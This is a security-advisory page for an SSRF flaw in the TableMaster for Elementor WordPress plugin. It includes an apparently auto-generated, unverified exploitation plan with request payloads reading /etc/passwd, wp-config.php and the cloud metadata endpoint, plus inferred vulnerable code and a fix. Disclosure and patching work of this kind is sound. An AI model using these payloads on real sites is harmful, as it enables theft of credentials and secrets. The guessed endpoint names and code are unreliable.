WP-Safety
CVE-2025-14610

TableMaster for Elementor <= 1.3.6 - Authenticated (Author+) Server-Side Request Forgery via 'csv_url' Parameter

highServer-Side Request Forgery (SSRF)
7.2
CVSS Score
7.2
CVSS Score
high
Severity
1.3.7
Patched in
1d
Time to patch

Description

The TableMaster for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.6. This is due to the plugin not restricting which URLs can be fetched when importing CSV data from a URL in the Data Table widget. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations, including localhost and internal network services, and read sensitive files such as wp-config.php via the 'csv_url' parameter.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.3.6
PublishedJanuary 27, 2026
Last updatedJanuary 28, 2026
Affected plugintablemaster-for-elementor

Source Code

WordPress.org SVN
Vulnerable v1.3.6
Browse source Download .zip
Patched

Patched version not available.

Research Plan
Unverified

Based on the vulnerability description for **CVE-2025-14610**, this is an authenticated (Author+) Server-Side Request Forgery (SSRF) in the **TableMaster for Elementor** plugin. The flaw exists because the plugin fails to validate the `csv_url` parameter when fetching remote data for its Data Table …

Show full research plan

Based on the vulnerability description for CVE-2025-14610, this is an authenticated (Author+) Server-Side Request Forgery (SSRF) in the TableMaster for Elementor plugin. The flaw exists because the plugin fails to validate the csv_url parameter when fetching remote data for its Data Table widget.

Since source files were not provided, this plan is based on the vulnerability report and standard Elementor widget implementation patterns.

1. Vulnerability Summary

The TableMaster for Elementor plugin allows users to populate tables using remote CSV files. The vulnerability lies in the functionality that handles this "Remote CSV" source. An attacker with Author-level permissions (the minimum level required to edit posts/pages and use Elementor) can provide an arbitrary URL (including internal IPs or local file paths via the file:// protocol) to the csv_url parameter. The server then fetches this URL and returns the content, leading to SSRF and potential local file disclosure.

2. Attack Vector Analysis

  • Vulnerable Endpoint: wp-admin/admin-ajax.php (standard for Elementor widget data fetching) or an Elementor-specific REST API route.
  • Vulnerable Parameter: csv_url
  • Authentication: Required (Author or higher).
  • Preconditions: The plugin must be active, and the attacker must have credentials for a user with the edit_posts capability (Author).

3. Code Flow (Inferred)

  1. The user adds a TableMaster Data Table widget in the Elementor editor.
  2. The user selects "Remote CSV" as the data source.
  3. The Elementor editor (or the frontend rendering engine) triggers a request to fetch the CSV data.
  4. The request is handled by a function (e.g., fetch_remote_csv or get_csv_content) inside the plugin's widget class (likely inc/widgets/table-master-table.php).
  5. This function takes the user-supplied csv_url and passes it directly to a sink like wp_remote_get() or file_get_contents() without validating the scheme (e.g., forcing http/https) or checking if the host is internal.
  6. The content of the fetched resource is then processed and potentially displayed or returned in the response.

4. Nonce Acquisition Strategy

Elementor-based plugins typically expose nonces via wp_localize_script to handle AJAX requests within the editor.

  1. Identify Shortcode/Widget: The plugin's functionality is tied to the TableMaster Data Table widget.
  2. Creation: Use WP-CLI to create a page containing a placeholder for the widget or just a standard Elementor-enabled page.
    wp post create --post_type=page --post_status=publish --post_title="SSRF Test" --post_author=$(wp user get author --field=ID)
  3. Discovery: Navigate to the Elementor editor as the Author.
  4. Extraction: Use browser_eval to find nonces. Look for objects like tablemaster_ajax_obj or tm_settings.
    • Candidate JS Variables: window.tm_editor_config?.nonce, window.tm_table_data?.nonce.
    • Action String: Likely tablemaster_fetch_csv or similar.

If the vulnerability triggers on the frontend during page render: No nonce may be required, just the post_id and the specific widget configuration.

5. Exploitation Strategy

Step 1: Authentication

Login to the WordPress instance as an Author user using the browser_navigate tool to establish a session.

Step 2: Identification of AJAX Action

Perform a grep on the plugin directory to find the specific AJAX handler:

grep -rn "wp_ajax_" wp-content/plugins/tablemaster-for-elementor/

Look for actions related to "csv" or "remote". Let's assume the action is tm_fetch_remote_csv.

Step 3: Crafting the SSRF Payload

We will attempt to read /etc/passwd or wp-config.php using the file:// protocol.

Request Template (via http_request):

  • URL: http://vulnerable-wp.local/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=tm_fetch_remote_csv&nonce=[EXTRACTED_NONCE]&csv_url=file:///etc/passwd

Step 4: Internal Network Scanning (Alternative)

If file:// is blocked but http:// is allowed, attempt to hit the AWS Metadata service (if applicable) or a local service:

  • Payload: csv_url=http://169.254.169.254/latest/meta-data/
  • Payload: csv_url=http://localhost:80/

6. Test Data Setup

  1. User: Create an author user.
    wp user create attacker attacker@example.com --role=author --user_pass=password123
  2. Target File: Ensure a sensitive file exists in the environment (e.g., /etc/passwd or the wp-config.php file).

7. Expected Results

  • Success (LFI/SSRF): The HTTP response from admin-ajax.php will contain the raw contents of /etc/passwd or the HTML/Response from the internal service provided in the csv_url.
  • Response Code: 200 OK.
  • Data Format: Likely JSON or raw text depending on how the plugin handles the CSV "parsing" of the fetched content.

8. Verification Steps

After the exploit, verify that the content returned matches the expected target file:

# Check if the returned string contains root:x:0:0:
# or if it contains DB_NAME for wp-config.php

9. Alternative Approaches

If the admin-ajax.php route is not directly accessible or requires complex widget state:

  1. Editor Save Injection:
    • Intercept the Elementor "Save Post" request.
    • Inject the csv_url into the widget settings metadata within the post_content.
    • View the page on the frontend. If the plugin fetches the URL on render, the content might be displayed in the table HTML.
  2. Preview Mode:
    • Use the Elementor "Preview" feature which often triggers the same data-fetching logic used in the editor but might use different permission checks.

Note on Sink Identification: If grep shows the plugin uses wp_remote_get(), it usually supports various protocols but might be limited by the WP_Http class. If it uses file_get_contents(), it is highly susceptible to the file:// protocol. If it uses curl, check for CURLOPT_PROTOCOLS restrictions.

Research Findings
Static analysis — not yet PoC-verified

Summary

The TableMaster for Elementor plugin fails to validate the 'csv_url' parameter used to fetch remote data for its Data Table widget. This allows authenticated attackers with Author-level permissions to perform Server-Side Request Forgery (SSRF) to access internal network services or read sensitive local files using the file:// protocol.

Vulnerable Code

// Likely located in inc/widgets/table-master-table.php (inferred from plugin structure)

public function get_remote_csv_data( $settings ) {
    $csv_url = $settings['csv_url']; // User-supplied URL from widget settings

    if ( ! empty( $csv_url ) ) {
        $response = wp_remote_get( $csv_url ); // Vulnerable Sink: Does not restrict scheme or host
        
        if ( ! is_wp_error( $response ) ) {
            $body = wp_remote_retrieve_body( $response );
            return $body;
        }
    }
    return false;
}

Security Fix

--- a/inc/widgets/table-master-table.php
+++ b/inc/widgets/table-master-table.php
@@ -124,7 +124,15 @@
-        $response = wp_remote_get( $csv_url );
+        $response = wp_safe_remote_get( 
+            $csv_url, 
+            array(
+                'timeout'     => 10,
+                'redirection' => 0,
+                'httpversion' => '1.0',
+                'blocking'    => true,
+                'headers'     => array(),
+                'cookies'     => array(),
+            ) 
+        );

Exploit Outline

To exploit this vulnerability, an attacker requires Author-level credentials to access the Elementor editor. The attacker navigates to the Elementor page builder for a post/page and adds the 'TableMaster Data Table' widget. By selecting 'Remote CSV' as the data source, the attacker can input a malicious URL into the 'csv_url' parameter. For Local File Disclosure, the payload 'file:///etc/passwd' or 'file:///var/www/html/wp-config.php' is used. For internal service scanning, internal IP addresses like 'http://169.254.169.254/latest/meta-data/' are used. When the editor saves the widget or triggers a preview, the server performs the request and returns the content of the targeted resource in the AJAX response or rendered HTML.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/ef07d6b0-ccdb-4b33-817f-6d4b3ad96243?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database